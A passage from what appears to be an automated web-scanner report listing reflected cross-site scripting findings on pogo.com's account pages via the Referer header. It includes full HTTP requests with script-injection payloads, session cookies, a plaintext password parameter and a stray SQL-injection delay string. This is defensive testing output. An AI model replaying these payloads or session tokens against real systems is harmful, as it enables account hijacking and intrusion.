Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/my-account/confirm-recover-password.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=990a5</script><script>alert(1)</script>ea916518bb7
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536429883-New%7C1297128429883%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:00:48 GMT
Server: Apache-Coyote/1.1
Content-Length: 35626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=990a5</script><script>alert(1)</script>ea916518bb7";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.665. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account/edit-checkout-settings.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e38fd</script><script>alert(1)</script>a0087aca4a3311088 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/my-account/edit-checkout-settings.do?box=on&box_hidden=true&button1=Save+Changes HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e38fd</script><script>alert(1)</script>a0087aca4a3311088
Cache-Control: max-age=0
Origin: http://www.pogo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536484113-New%7C1297128484113%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:06:35 GMT
Server: Apache-Coyote/1.1
Content-Length: 36114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=e38fd</script><script>alert(1)</script>a0087aca4a3311088";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.666. http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account/edit-checkout-settings.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e862</script><script>alert(1)</script>4b4db4ca10a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/my-account/edit-checkout-settings.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=4e862</script><script>alert(1)</script>4b4db4ca10a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536480861-New%7C1297128480861%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:01:35 GMT
Server: Apache-Coyote/1.1
Content-Length: 35607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=4e862</script><script>alert(1)</script>4b4db4ca10a";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.667. http://www.pogo.com/account/my-account/main.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account/main.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c90</script><script>alert(1)</script>b96d37eb0ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/my-account/main.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=62c90</script><script>alert(1)</script>b96d37eb0ff
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536471206-New%7C1297128471206%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:02:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 35444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=62c90</script><script>alert(1)</script>b96d37eb0ff";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.668. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account/recover.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f349d</script><script>alert(1)</script>417f6300586 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/my-account/recover.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f349d</script><script>alert(1)</script>417f6300586
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536425818-New%7C1297128425818%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:00:54 GMT
Server: Apache-Coyote/1.1
Content-Length: 35473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=f349d</script><script>alert(1)</script>417f6300586";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.669. http://www.pogo.com/account/my-account/recover.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/my-account/recover.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9393</script><script>alert(1)</script>9d11b28022caefc05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/my-account/recover.do?button3=button1&screenname=k7240&button1=Send+Me+My+Password&email= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c9393</script><script>alert(1)</script>9d11b28022caefc05
Cache-Control: max-age=0
Origin: http://www.pogo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536429883-New%7C1297128429883%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:58:59 GMT
Server: Apache-Coyote/1.1
Content-Length: 36302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=c9393</script><script>alert(1)</script>9d11b28022caefc05";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.eVar18="un_header_prizes%27%2C0%29waitfor%2520delay%270%253a0%253a20%27--";
s.prop7="POGO:pogo:::Pog
...[SNIP]...

3.670. http://www.pogo.com/account/verify-password.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/verify-password.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd99d</script><script>alert(1)</script>c16bfc7e88aeee608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/verify-password.do?password=Idunno1&button1=Continue HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=bd99d</script><script>alert(1)</script>c16bfc7e88aeee608
Cache-Control: max-age=0
Origin: http://www.pogo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536400754-New%7C1297128400754%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:00:50 GMT
Server: Apache-Coyote/1.1
Content-Length: 35816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=bd99d</script><script>alert(1)</script>c16bfc7e88aeee608";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.671. http://www.pogo.com/account/verify-password.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/verify-password.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3627</script><script>alert(1)</script>7d4bd838e4e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /account/verify-password.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a3627</script><script>alert(1)</script>7d4bd838e4e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536393024-New%7C1297128393024%3B

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache-Coyote/1.1
Content-Length: 35436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=a3627</script><script>alert(1)</script>7d4bd838e4e";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.672. http://www.pogo.com/action/pogo/confirmation.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/confirmation.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dcc</script><script>alert(1)</script>48280d89769 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogo/confirmation.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a4dcc</script><script>alert(1)</script>48280d89769
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:00:39 GMT
Server: Apache-Coyote/1.1
Content-Length: 35455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.eVar5="cp_10price_1110_cpcom_right_button";
s.referrer="http://www.google.com/search?hl=en&q=a4dcc</script><script>alert(1)</script>48280d89769";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.673. http://www.pogo.com/action/pogo/createAccount.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/createAccount.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 743ee</script><script>alert(1)</script>ff787b7638f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /action/pogo/createAccount.do?pageSection=homnav_register HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=743ee</script><script>alert(1)</script>ff787b7638f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
